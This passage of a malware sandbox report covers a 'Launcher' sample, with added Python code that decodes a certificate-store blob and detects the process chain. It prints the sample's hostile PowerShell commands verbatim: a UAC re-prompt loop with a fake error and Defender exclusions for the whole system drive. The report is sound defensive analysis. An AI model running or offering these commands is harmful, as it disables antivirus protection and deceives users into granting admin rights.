C:\Windows\system32\AUDIODG.EXE 0x41c
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/3168-4-0x00007FF8E6830000-0x00007FF8E721C000-memory.dmp
memory/3168-5-0x0000021C22490000-0x0000021C224B2000-memory.dmp
memory/3168-7-0x0000021C22500000-0x0000021C22510000-memory.dmp
memory/3168-6-0x0000021C22500000-0x0000021C22510000-memory.dmp
memory/3168-10-0x0000021C22790000-0x0000021C22806000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5msxsfyw.pkv.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3168-31-0x0000021C22500000-0x0000021C22510000-memory.dmp
memory/3168-37-0x00007FF8E6830000-0x00007FF8E721C000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
136s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\mtgtTlysOs1Z.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x380
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.193.132.51.in-addr.arpa | udp |
Files
memory/192-4-0x000002B864780000-0x000002B8647A2000-memory.dmp
memory/192-5-0x00007FF8DA030000-0x00007FF8DAA1C000-memory.dmp
memory/192-6-0x000002B84C300000-0x000002B84C310000-memory.dmp
memory/192-7-0x000002B84C300000-0x000002B84C310000-memory.dmp
memory/192-10-0x000002B864930000-0x000002B8649A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bxtcg1as.rfm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/192-31-0x000002B84C300000-0x000002B84C310000-memory.dmp
memory/192-37-0x00007FF8DA030000-0x00007FF8DAA1C000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
63s
Max time network
84s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
121s
Max time network
138s
Command Line
Signatures
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (same Blob value as the row above) | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (same Blob value as the row above) | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (same Blob value as the row above) | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
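Added example, not part of the sandbox report and not code from the sample: a decoder for the Blob value in the rows above, so the "Modifies system certificate store" signature can be judged rather than just counted. The value is a CryptoAPI serialised certificate context: a run of records, each laid out as DWORD property ID, DWORD reserved (always 1), DWORD length, then the data. Property 0x20 is the DER certificate, 0x03 its SHA-1 thumbprint (also the registry key name), 0x0b the friendly name as NUL-terminated UTF-16LE; the property IDs named in the block are the wincrypt.h constants. The block embeds the friendly-name and SHA-1 records copied verbatim from the row above; because the certificate record is truncated on this page, the excerpt has no 0x20 property and the hash check is exercised on a constructed stand-in blob instead. Decoded, the friendly name is "GlobalSign Root CA - R3" and the stored hash equals the key name D69B561148F01C77C54578C10926DF5B856976AD. AuthRoot is the store fed by Windows' automatic root certificate update, so a public root landing there with a consistent thumbprint is what the OS does when a TLS chain needs that root; a planted CA would show up as a write to the ROOT store (none appears on this page) or as a certificate whose recomputed hash does not match the key it sits under.

```python
"""Decode the registry Blob value Windows writes under
HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\<store>\\Certificates\\<SHA1>\\Blob.

Added example for this report; not code from the sandbox or from the sample.
The value is a CryptoAPI serialised certificate context: a run of records,
each laid out as  DWORD propId | DWORD reserved (=1) | DWORD cbData | data.
Property 0x20 (CERT_CERT_PROP_ID) holds the DER certificate; its SHA-1 is
property 0x03 and is also the registry key name, so an entry whose key name
disagrees with the hash of the embedded certificate was not written by
CryptoAPI.
"""
import hashlib
import struct
from typing import Dict, List, Optional, Tuple

# Property IDs from wincrypt.h that matter for triage.
CERT_SHA1_HASH_PROP_ID = 0x03
CERT_MD5_HASH_PROP_ID = 0x04
CERT_ENHKEY_USAGE_PROP_ID = 0x09
CERT_FRIENDLY_NAME_PROP_ID = 0x0B
CERT_KEY_IDENTIFIER_PROP_ID = 0x14
CERT_CERT_PROP_ID = 0x20

Property = Tuple[int, bytes]


def parse_cert_blob(blob: bytes) -> List[Property]:
    """Split a blob into (propId, data) records; reject malformed input."""
    props: List[Property] = []
    off = 0
    while off < len(blob):
        if len(blob) - off < 12:
            raise ValueError(f"truncated property header at offset {off}")
        prop_id, reserved, size = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1:
            raise ValueError(f"reserved field is {reserved}, expected 1")
        if off + size > len(blob):
            raise ValueError(f"property {prop_id:#x} runs past the end of the blob")
        props.append((prop_id, blob[off:off + size]))
        off += size
    return props


def friendly_name(props: List[Property]) -> Optional[str]:
    """CERT_FRIENDLY_NAME_PROP_ID is a NUL-terminated UTF-16LE string."""
    for pid, data in props:
        if pid == CERT_FRIENDLY_NAME_PROP_ID:
            return data.decode("utf-16-le").rstrip("\x00")
    return None


def check_thumbprint(props: List[Property], registry_key_name: str) -> Dict[str, object]:
    """Recompute SHA-1 over the embedded DER and compare it with the stored
    hash property and with the registry key name the blob sits under."""
    by_id = dict(props)
    der = by_id.get(CERT_CERT_PROP_ID)
    stored = by_id.get(CERT_SHA1_HASH_PROP_ID, b"").hex().upper()
    computed = hashlib.sha1(der).hexdigest().upper() if der is not None else None
    return {
        "certificate_present": der is not None,
        "stored_sha1": stored,
        "computed_sha1": computed,
        "key_name_matches": computed is not None and computed == registry_key_name.upper(),
        "stored_hash_matches": computed is not None and computed == stored,
    }


def build_cert_blob(name: str, der: bytes) -> bytes:
    """Serialise a minimal blob in the same layout (used for offline tests)."""
    records = [
        (CERT_SHA1_HASH_PROP_ID, hashlib.sha1(der).digest()),
        (CERT_FRIENDLY_NAME_PROP_ID, (name + "\x00").encode("utf-16-le")),
        (CERT_CERT_PROP_ID, der),
    ]
    return b"".join(struct.pack("<III", pid, 1, len(d)) + d for pid, d in records)


# Friendly-name and SHA-1 records copied verbatim from the Blob row above.
# The certificate record is truncated on this page, so the excerpt has no
# CERT_CERT_PROP_ID and check_thumbprint() reports certificate_present=False.
REPORT_EXCERPT_HEX = (
    "0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000"
    "030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad"
)
REPORT_KEY_NAME = "D69B561148F01C77C54578C10926DF5B856976AD"

# Constructed stand-in (not a real certificate) so the hash check can run.
FAKE_DER = b"\x30\x82\x01\x00" + bytes(range(256))
FAKE_BLOB = build_cert_blob("Example Root", FAKE_DER)

if __name__ == "__main__":
    excerpt = parse_cert_blob(bytes.fromhex(REPORT_EXCERPT_HEX))
    print(friendly_name(excerpt), check_thumbprint(excerpt, REPORT_KEY_NAME))
    fake = parse_cert_blob(FAKE_BLOB)
    print(friendly_name(fake), check_thumbprint(fake, hashlib.sha1(FAKE_DER).hexdigest()))
```

On a live host the same function takes the raw bytes of the Blob value read from the registry; the two checks worth alerting on are a ROOT-store entry whose recomputed SHA-1 is not a known public root, and any entry where key_name_matches or stored_hash_matches is false, since CryptoAPI never writes those inconsistently.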
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
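Added example, not code from the sandbox or from the sample: detection rules for the chain recorded in the Processes list above, run over constructed process-creation events whose command lines are copied from this page (the PIDs, parent images and field names are invented; Sysmon Event ID 1 or any EDR process-creation event carries the same fields). Read with its line breaks restored, the first PowerShell command loops on Start-Process -Verb RunAs against Launcher.exe until the UAC prompt is accepted, writing a fake 'Error 0xc0000906' each time it is declined; the second adds Defender exclusions for ProgramData, AppData and the whole system drive; cmd.exe then removes the staging directory under AppData\Roaming. The rules key on those command-line features and on PowerShell being spawned by a binary running out of the user's Temp directory.

```python
"""Detection rules for the process chain recorded in behavioral10 above.

Added example for this report, not output of the sandbox or code from the
sample. The events below are constructed: the command lines are copied
from this page, the PIDs, parent images and field names are made up.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

SEVERITY = {"medium": 1, "high": 2, "critical": 3}


@dataclass(frozen=True)
class Rule:
    name: str
    severity: str
    patterns: Tuple[str, ...]   # every pattern must match the command line (AND)


RULES: List[Rule] = [
    Rule("ps_execution_policy_bypass", "medium",
         (r"(?i)powershell(?:\.exe)?\b", r"(?i)-(?:ep|ex[a-z]*)\s+bypass\b")),
    Rule("ps_script_from_user_temp", "medium",
         (r"(?i)powershell(?:\.exe)?\b", r"(?i)-file\s+\S*\\AppData\\Local\\Temp\\")),
    # Re-prompts UAC until the user clicks Yes; the catch block prints a
    # fake error so the retry looks like a crash rather than a loop.
    Rule("uac_prompt_loop", "high",
         (r"(?i)\bwhile\s*\(", r"(?i)\bStart-Process\b", r"(?i)-Verb\s+RunAs\b")),
    Rule("defender_exclusion_added", "high",
         (r"(?i)\bAdd-MpPreference\b", r"(?i)-Exclusion(?:Path|Process|Extension)\b")),
    # Excluding $env:SystemDrive\ (or any bare drive root) turns Defender
    # off for the whole disk, not just the malware's own directories.
    Rule("defender_exclusion_whole_drive", "critical",
         (r"(?i)\bAdd-MpPreference\b",
          r"(?i)(?:\$env:SystemDrive|\b[a-z]:)\\(?:[\s\"',]|$)")),
    Rule("self_delete_via_cmd", "high",
         (r"(?i)\bcmd(?:\.exe)?\b", r"(?i)\br(?:d|mdir)\s+/s\s+/q\b", r"(?i)\\AppData\\")),
]

RULE_SEVERITY = {r.name: r.severity for r in RULES}
RULE_SEVERITY["ps_spawned_by_temp_binary"] = "medium"


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches, in RULES order."""
    cmd = event.get("CommandLine", "")
    hits = [r.name for r in RULES if all(re.search(p, cmd) for p in r.patterns)]
    # Parent/child context: PowerShell launched by a binary running out of
    # the user's Temp directory (Launhcer.exe / Launcher.exe in this report).
    if (re.search(r"(?i)\\powershell\.exe$", event.get("Image", ""))
            and re.search(r"(?i)\\AppData\\Local\\Temp\\", event.get("ParentImage", ""))):
        hits.append("ps_spawned_by_temp_binary")
    return hits


def triage(events: List[Dict[str, str]]) -> Dict[str, object]:
    """Score a batch of events; the chain is rated by its worst single hit."""
    per_event = {e["ProcessId"]: evaluate(e) for e in events}
    severities = [RULE_SEVERITY[h] for hits in per_event.values() for h in hits]
    worst = max(severities, key=SEVERITY.__getitem__, default=None)
    return {"findings": per_event,
            "worst_severity": worst,
            "flagged_pids": [pid for pid, hits in per_event.items() if hits]}


# Constructed events mirroring the behavioral10 chain; PIDs are invented.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ProcessId": "1000", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe",
     "CommandLine": r'"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"'},
    {"ProcessId": "1001", "ParentImage": r"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe",
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"'''},
    {"ProcessId": "1002", "ParentImage": r"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe",
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "'''},
    {"ProcessId": "1003", "ParentImage": r"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe",
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'''"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT'''},
    {"ProcessId": "1004", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\QsVakRcJSHTg.ps1"},
    # Benign controls that must not fire.
    {"ProcessId": "2000", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"ProcessId": "2001", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c dir C:\Users\Admin'},
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS)["findings"].items():
        print(pid, hits)
```

The whole-drive rule is the one worth paging on: an exclusion for $env:SystemDrive\ covers every file Defender would otherwise scan, and on a live host it is confirmed by comparing the ExclusionPath list from Get-MpPreference against the baseline. The ExecutionPolicy rule alone is noisy in administrative environments, which is why the scoring here lets it stay at medium and relies on the parent-process and Add-MpPreference rules to lift the chain.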
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 252.15.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
Files
memory/1632-2-0x0000000072730000-0x0000000072E1E000-memory.dmp
memory/1632-4-0x0000000007430000-0x0000000007440000-memory.dmp
memory/1632-3-0x0000000007310000-0x0000000007346000-memory.dmp
memory/1632-5-0x0000000007430000-0x0000000007440000-memory.dmp
memory/1632-6-0x0000000007A70000-0x0000000008098000-memory.dmp
memory/1632-7-0x0000000007A10000-0x0000000007A32000-memory.dmp
memory/1632-8-0x00000000082F0000-0x0000000008356000-memory.dmp
memory/1632-9-0x00000000083A0000-0x0000000008406000-memory.dmp
memory/1632-10-0x0000000008410000-0x0000000008760000-memory.dmp
memory/1632-11-0x0000000008240000-0x000000000825C000-memory.dmp
memory/1632-12-0x00000000087E0000-0x000000000882B000-memory.dmp
memory/1632-13-0x0000000008B30000-0x0000000008BA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfnruqfw.jm4.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1632-28-0x0000000009BB0000-0x0000000009C44000-memory.dmp
memory/1632-29-0x00000000098F0000-0x000000000990A000-memory.dmp
memory/1632-30-0x0000000009940000-0x0000000009962000-memory.dmp
memory/1632-31-0x000000000A150000-0x000000000A64E000-memory.dmp
memory/4216-38-0x0000000072730000-0x0000000072E1E000-memory.dmp
memory/4216-39-0x0000000006BB0000-0x0000000006BC0000-memory.dmp
memory/4216-40-0x0000000006BB0000-0x0000000006BC0000-memory.dmp
memory/4216-57-0x000000007EFE0000-0x000000007EFF0000-memory.dmp
memory/4216-58-0x00000000090F0000-0x0000000009123000-memory.dmp
memory/4216-59-0x000000006F4D0000-0x000000006F51B000-memory.dmp
memory/4216-60-0x00000000090D0000-0x00000000090EE000-memory.dmp
memory/4216-65-0x0000000009140000-0x00000000091E5000-memory.dmp
memory/4216-66-0x0000000006BB0000-0x0000000006BC0000-memory.dmp
memory/1632-192-0x0000000072730000-0x0000000072E1E000-memory.dmp
memory/4216-260-0x0000000006D90000-0x0000000006DAA000-memory.dmp
memory/4216-265-0x0000000006D80000-0x0000000006D88000-memory.dmp
memory/4216-281-0x0000000072730000-0x0000000072E1E000-memory.dmp
memory/1632-282-0x0000000007430000-0x0000000007440000-memory.dmp
memory/1632-284-0x0000000007430000-0x0000000007440000-memory.dmp
memory/1632-285-0x0000000007430000-0x0000000007440000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 69abf6b01a287d3bab9aa753a19562ac |
| SHA1 | cb002d745055132c11e5432f9ca5c8f452c6067d |
| SHA256 | 477924224be8ac5194c94a52115ac451c63530c0ce9bfe757598ef9cf84b495e |
| SHA512 | 70c2b8f847da67b95a3d15cea9912cddddfc59d7f1f2f350c3c1c13e28baa5f6efd448013e5134e9f909705be7b0e38e6748aacce4237e6b0e2cdedaa647bccf |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | db01a2c1c7e70b2b038edf8ad5ad9826 |
| SHA1 | 540217c647a73bad8d8a79e3a0f3998b5abd199b |
| SHA256 | 413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d |
| SHA512 | c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6 |
memory/1632-290-0x0000000072730000-0x0000000072E1E000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
117s
Max time network
140s
Command Line
Signatures
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546
916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
